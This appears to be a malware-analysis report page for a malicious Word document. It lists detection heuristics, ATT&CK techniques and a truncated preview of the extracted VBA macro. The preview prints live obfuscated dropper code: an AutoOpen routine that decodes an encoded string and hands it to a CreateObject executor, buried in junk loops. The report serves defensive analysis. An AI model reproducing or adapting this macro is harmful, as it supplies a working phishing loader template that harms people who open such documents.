MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. The macro utilizes CreateObject and Shell() calls, indicating an intent to download and execute a second-stage payload. The ClamAV detection further confirms its malicious nature.
Heuristics 8
-
ClamAV: Doc.Macro.Obfuscated-6397052-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscated-6397052-2
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 68616 bytes |
SHA-256: fc4833fdda3ee8381c645d2dce45ad2fb53a4befb730cf36d96c1f95fc8e3f77 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "sQYppTLCotAOVAwKmGl"
Sub AutoOpen()
Dim HCUgCTrhEczyc As String: HCUgCTrhEczyc = vZcCKRooQWIXQ("Dh4HEVNARQIbAARSRRNuRjVDb1AiV3IcH1dLEQ==")
lkSAYFPjAlGgNC.TWROvqCvkFAHOVAr (wcVrOCpLBDRplrHiCF(HCUgCTrhEczyc, "fjsaiojgiower$@)G$@)G$@(123tu89013tT*$T@()!#T)$T(RGIWKWEPEQF{fg]erpj;lksdf8924otgERGIW#*@#($TR(W@GUWG(@#RIDSJVXDASUIT("))
End Sub
Public Function BGcqSbFvoloBXHiypb(rtpQWcmioKTUTPcl As String) As Object
Dim ZigsemUogdi As Collection
Set ZigsemUogdi = New Collection
ZigsemUogdi.Add "RmwOZOnjESHlvc"
ZigsemUogdi.Add "QDKUHdTxGROAu"
ZigsemUogdi.Add "YCzAMXnKtoyRTdLVtZ"
ZigsemUogdi.Add "QqafkRvpSEhPOzhu"
ZigsemUogdi.Add "MEJmbCkDzRkVx"
ZigsemUogdi.Add "OXEvDisOFFcZpZZfML"
Set BGcqSbFvoloBXHiypb = VBA.CreateObject(rtpQWcmioKTUTPcl)
End Function
Public Function vZcCKRooQWIXQ(NGcYeSWwqWBUNwD As String, Optional BZuLpbNVRTvRFfWqC As Boolean = True) As String
Dim opBjnkOoToAkISbpj: opBjnkOoToAkISbpj = Array("dKiXtkcrdklxGA""ALEDuYGyRqNuHXrLbRa""RksJvkjGOPN""CMayGoumLSPnq""JIcbsOQwSpKtATfKM""lJyKCozjsLzjceD""zgDgfJTSspek")
Static RccTfUsvMmURR(0 To 255) As Byte
Dim DXTtYIiqTgBZHdSyqk As Collection
Set DXTtYIiqTgBZHdSyqk = New Collection
DXTtYIiqTgBZHdSyqk.Add "FaikxNQgSOwpoSU"
DXTtYIiqTgBZHdSyqk.Add "UagowtNOEUwKEpO"
DXTtYIiqTgBZHdSyqk.Add "aAwaDQApOYxijUEFo"
DXTtYIiqTgBZHdSyqk.Add "vpVwtHfGalhhSp"
Dim buPbuROcYYqlTRMZTlB() As Byte, fLmmaqidsaJlpt() As Byte
Dim rAIEZYgbWBzdjKMN As Integer
rAIEZYgbWBzdjKMN = 9 * 1
Dim HeRwylAyEIduC As Long, FXuYECZFqhd As Long
Dim NlXweQQqSCdL, vVHBAmCtGSP As Integer
NlXweQQqSCdL = 1
vVHBAmCtGSP = 85
While NlXweQQqSCdL < vVHBAmCtGSP
vVHBAmCtGSP = vVHBAmCtGSP - NlXweQQqSCdL
Wend
If RccTfUsvMmURR(0) = 0 Then
Dim ZrAODEQFQway, mStdFGRwygEeBiMv As Integer
For mStdFGRwygEeBiMv = 0 To 3
ZrAODEQFQway = ZrAODEQFQway + mStdFGRwygEeBiMv
Next mStdFGRwygEeBiMv
For HeRwylAyEIduC = 0 To 255
Dim FQggOPPsTVKAtXJEF, eobvNqmqpromJvij As Integer
FQggOPPsTVKAtXJEF = 7
eobvNqmqpromJvij = 66
While FQggOPPsTVKAtXJEF < eobvNqmqpromJvij
eobvNqmqpromJvij = eobvNqmqpromJvij - FQggOPPsTVKAtXJEF
Wend
RccTfUsvMmURR(HeRwylAyEIduC) = 255
Dim OazgVwCeYaGNc, BdPhbCCpnagdwgN As Integer
For BdPhbCCpnagdwgN = 0 To 1
OazgVwCeYaGNc = OazgVwCeYaGNc + BdPhbCCpnagdwgN
Next BdPhbCCpnagdwgN
Next HeRwylAyEIduC
Dim uEgAaqicFIEkRtUUf As Integer
uEgAaqicFIEkRtUUf = 4
Dim KxmmnhOHnRijyIebyw As Integer
KxmmnhOHnRijyIebyw = 2 - 7 * 1
If uEgAaqicFIEkRtUUf < Len(Application.UserName) Then
Dim docfnnfbfVTivvvxaSB, QeGsWglCEBPrOtm As Integer
For QeGsWglCEBPrOtm = 0 To 6
docfnnfbfVTivvvxaSB = docfnnfbfVTivvvxaSB + QeGsWglCEBPrOtm
Next QeGsWglCEBPrOtm
Dim bCKZuMsnGSlzAfxMW As Variant
End If
For HeRwylAyEIduC = 0 To 25
Dim ipZPaJOBTXkpFaIW, qSwENNFCmBNHFicRvtb As Integer
ipZPaJOBTXkpFaIW = 5
qSwENNFCmBNHFicRvtb = 38
While ipZPaJOBTXkpFaIW < qSwENNFCmBNHFicRvtb
qSwENNFCmBNHFicRvtb = qSwENNFCmBNHFicRvtb - ipZPaJOBTXkpFaIW
Wend
RccTfUsvMmURR(HeRwylAyEIduC + 65) = HeRwylAyEIduC
Dim GWHavjycgvwwKUoFs, ofokysBifkgminNBAGa As Integer
For ofokysBifkgminNBAGa = 0 To 7
GWHavjycgvwwKUoFs = GWHavjycgvwwKUoFs + ofokysBifkgminNBAGa
Next ofokysBifkgminNBAGa
Next HeRwylAyEIduC
Dim yXiAKOAgsuGslosdFu: yXiAKOAgsuGslosdFu = Array("xQdUkmGApdDMHyxugPJ")
For HeRwylAyEIduC = 26 To 51
Dim InbBscmMxAhyu, OAeXlNNEHKnsUxk As Integer
For OAeXlNNEHKnsUxk = 0 To 2
InbBscmMxAhyu = InbBscmMxAhyu + OAeXlNNEHKnsUxk
Next OAeXlNNEHKnsUxk
RccTfUsvMmURR(HeRwylAyEIduC + 71) = HeRwylAyEIduC
Dim fnLDlNKYeZCv As Integer
fnLDlNKYeZCv = 9
Dim bmVyHktIzDBxfrPfEC: bmVyHktIzDBxfrPfEC = Array("ZBiaBMykZIo""zVMGqpzbAyw""DkHWnbHezLNEsjhZj""VzLCiuuAnZqFXzr""txmrEggyeoKuA""IxHlHmSVWfZQAcQL""OgZupMyAuwxPfxvqFrM")
If fnLDlNKYeZCv < Len(Application.UserName) Then
Dim PLWHCnzTGPrKtwaJL As Collection
Set PLWHCnzTGPrKtwa
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.